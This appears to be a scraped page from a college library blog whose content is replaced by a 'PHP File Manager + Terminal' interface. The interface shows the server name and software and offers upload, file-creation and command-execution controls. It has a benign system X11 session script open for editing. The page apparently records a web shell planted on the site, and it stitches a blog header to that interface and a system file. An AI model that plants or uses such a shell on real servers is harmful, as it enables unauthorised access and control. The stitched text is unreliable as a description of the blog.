Looking for something? Use OneSearch! Posted on January 23, 2020 (February 3, 2025) by Rebecca Hyams PHP File Manager + Terminal PHP File Manager + TerminalServer: www.bmcc.cuny.eduSoftware: Apache/2.4.62 (Debian)Current directory: //etc/X11/Xsession.d Upload Create File Create Folder Execute Editing: /etc/X11/Xsession.d/35x11-common_xhost-local# This file is sourced by Xsession(5), not executed. # If xhost (from x11-xserver-utils) is installed, use it to give access # to the X server to any process from the same user on the local host. # Unlike other uses of xhost, this is safe since the kernel can check # the actual owner of the calling process. if type xhost >/dev/null 2>&1; then xhost +si:localuser:$(id -un) || : fi Save